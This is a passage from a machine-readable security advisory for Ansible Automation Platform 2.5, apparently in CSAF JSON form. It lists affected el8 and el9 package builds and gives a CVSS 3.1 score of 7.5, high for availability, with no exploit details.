"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
